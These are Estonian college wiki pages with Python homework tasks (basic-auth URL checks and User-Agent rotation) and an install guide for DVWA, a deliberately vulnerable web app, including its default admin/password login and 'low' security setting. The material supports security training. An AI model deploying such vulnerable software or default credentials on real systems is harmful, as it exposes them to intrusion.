Kui skriptil on vale arv parameetreid või skript ei saa faile avada sobivaks operatsiooniks või faili kirjutada/lugeda, siis tuleb tagastada veakood sys.exit(X). Veakoodid valid ja dokumenteerid ise.

==Näidiskodutöö neile, kes ise teemat ei leidnud ja õppejõult ei saanud==

Skriptil on kaks parameetrit.

1. sisendfaili nimi

2. väljundfaili nimi

Skript kontrollib, et ette oleks antud kaks parameetrit ja sisendfailist saab lugeda ja väljundfaili saab kirjutada.

Sisendfailis on komadega eraldatud 3 tulpa

1. URL,kasutajanmi,parool,otsitav string

Näiteks
<pre>
http://enos.itcollege.ee,robot,kala,Server
http://enos.itcollege.ee/~mernits/basicauth/kala.html,robot,kala,SIIN EI OLE KALA
http://robot.itcollege.ee/kala.html,,,KALA
</pre>

Kui server nõuab basic autentimist, siis kasutad antud kasutajanime ja parooli. Kui server ei nõua autentimist, siis kasutajanime ja parooli ei saadeta.

Kui kasutajanimi ja parool puuduvad, siis kasutajanime ja parooli ei saadeta. (kasutajanimi ja parool ei pea olema kirjas)

Skript teeb päringu iga sisendfaili rea kohta ja kirjutab väljundfaili kujul:

URL,kuupäev-kellaaeg kujul (AAASTA-KUU-PÄEV TUNNID:MINUTID:SEKUNDID),kasutajanimi,parool,otsitav string,OK

Kui päringu vastuses oli otsitav string ja rea:

URL,kuupäev-kellaaeg kujul (AAASTA-KUU-PÄEV TUNNID:MINUTID:SEKUNDID),kasutajanimi,parool,otsitav string,NOK

Kui otsitav string puudus, või kasutajanimi parool oli vale või server ei vastanud (ehk kõik ülejäänud juhud, kui otsitavat stringi ei leitud)

==Kodutöö või arvestuse python skript (neile, kes esitavad selle kuni 28.mai.2013 enne arvestuse algust)==

Looge skript, mis teeb päringuid esimese argumendina antud veebilehe pihta ja vahetab iga päringuga browser stringi, millede nimekiri on ette antud failis data.txt

Failinimi olgu kujul p2ring.eesnimi.perenimi.py, ehk kirjutad sinna oma nime

Näiteks: ./p2ring.margus.ernits.py http://wiki.itcollege.ee/

ja data näitesisu:
<pre>
Mozilla (libwhisker/2.4)
Mozilla (Mozilla@somewhere.com)
Mozilla 4.0(compatible; BotSeer/1.0; +http://botseer.ist.psu.edu)
Mozilla/1.1 (compatible; MSPIE 2.0; Windows CE)
Mozilla/1.10 [en] (Compatible; RISC OS 3.70; Oregano 1.10)
Mozilla/1.22 (compatible; MSIE 2.0d; Windows NT)
Mozilla/1.22 (compatible; MSIE 5.01; PalmOS 3.0)
Mozilla/2.0
Mozilla/2.0 (compatible; AOL 3.0; Mac_PowerPC)
</pre>

Veatöötlis: Kui faili ei ole või seda ei saa avada, siis skripti väljumiskood (exit code) on 1.

Hindid: urllib2 urllib changing user agent

Skript saatke õppejõu (Margus Ernits) e-posti aadressile margus.ernitsÄTTitcollege.ee.

NB: Sama ülesannet võib esitada bash arvestustööna, kui kodutöö on olemas.

DVWA

2015-04-06T08:26:17Z

Mernits: /* Allalaadimine ja lahtipakkimine */

==Autor==

Dmitri Šlõkov AK31 
Esimene versioon 05/05/2012 
Viimati muudetud {{REVISIONDAY2}}/{{REVISIONMONTH}}/{{REVISIONYEAR}} {{REVISIONUSER}} 'i poolt. 

Timestamp ({{REVISIONTIMESTAMP}})


==Sissejuhatus==
Damn Vulnerable Web App (DVWA)on PHP/MySQL veebirakendus mis on turvaauke täis. Selle peamisteks eesmärkideks on olla abiks julgeoleku spetsialistidele oma oskuste ja vahendite testimiseks, ning arendajatele näidiseks kuidas ei tohi oma rakendusi programmeerida.

[[File:Joonis1.png |400px|thumb|right|]]

== Eeldused ==

Eelduseks on arvutisse eelpaigaldatud Apache, MySQL andmebaasimootor koos teadaoleva kasutajanimega ja salasõnaga ning PHP tugi, ning Unzip arhiivi lahti pakimiseks.

<pre>
sudo apt-get install apache2 libapache2-mod-php5 php5-mysql mysql-server unzip -y
</pre>

Ning tuleb end logida juurkasutajaks
<pre>sudo -i</pre>

== Allalaadimine ja lahtipakkimine ==

[[File:Joonis2.png |400px|thumb|right|]]

[[File:Joonis3.png |400px|thumb|right|]]

Allalaadimiseks tuleb kasutada käsureas "wget" rakendust ja kui kasutate graafilise keskkonnaga süsteemi siis veebilehitseja.
<pre>
wget https://codeload.github.com/RandomStorm/DVWA/zip/v1.0.8 -O DVWA-1.0.8.zip
</pre>
Kui Unzip'i ei ole siis tuleb see paigaldata käsuga:
<pre>
apt-get install unzip
</pre>
Pakime lahti arhiivi sisu kasutades käsu:
<pre>
unzip DVWA-1.0.8.zip
</pre>
Lahtipakitud failid tuleb liigutada Veebiserveri juurkausta :
<pre>
mv DVWA-1.0.8 /var/www/dvwa
</pre>


Muutke kasutaja ja grupp selliselt, et veebiserveril oleks õigus dvwa kausta kirjutada.
<pre>
chown www-data:www-data /var/www/dvwa/ -R
</pre>

== Andmebaasi loomine ==

Teeme lahti veebilehitsejaga
http://SERVERI_IP/dvwa/index.php
Kui vajalikud moodulid on paigaldatud siis ilmub jargmine pilt (Joonis1).
Vajutame "here" linki peale. 
Ette tuleb andmebaasi loomise leht, vajutame "Create / Reset Dataase".
Kui MySQL root salasõnaks on midagit muud peale tühja salasõna, siis tuleb veateade "Could not connect to the database - please chack the config file ".

Selleks tekstiredaktoriga teeme lahti konfiguratsioonifaili
<pre>
nano /var/www/dvwa/config/config.inc.php
</pre>
Seal tuleb ülevaadata MySQL kasutajanimi ja salasõna:

<pre>
$_DVWA[ 'db_user' ] = 'root';

$_DVWA[ 'db_password' ] = 'TEIE SALASÕNA';

$_DVWA[ 'db_database' ] = 'dvwa';

Salvestamiseks CTRL + X
</pre>

Kui see tegevus tehtud vajutame uuesti "Create / Reset Dataase"
Kui rekvisiidid olid õigesti sisestatud, siis ilmub järgmine pilt. Kus räägitakse millised tehingud olid teostatud.

Valime vasakpoolsest menüüst "Home"

== Sisselogimine ==

[[File:Joonis4.png |400px|thumb|right|]]

Sisestame : 
Kasutajanimeks : admin 
Salasõnaks : password 


== Keerukus taseme valimine ==

Õnnestunud sisselogimise puhul valime menüüst "DVWA Security", selleks et seadistada vajaliku turvaaukude koguse ja kerukuse.

Näiteks "low" ning vajutame "Submit" nende seadistuste rakendamikesk.


Kõik! Rakendus on valmis kasutamiseks.

== Kasutatud allikad==
<ol>
<li>http://code.google.com/p/dvwa/wiki/README</li>
<li>http://meta.wikimedia.org/wiki/Help:HTML_in_wikitext</li>
</ol>
[[Category:IT infrastruktuuri teenused]]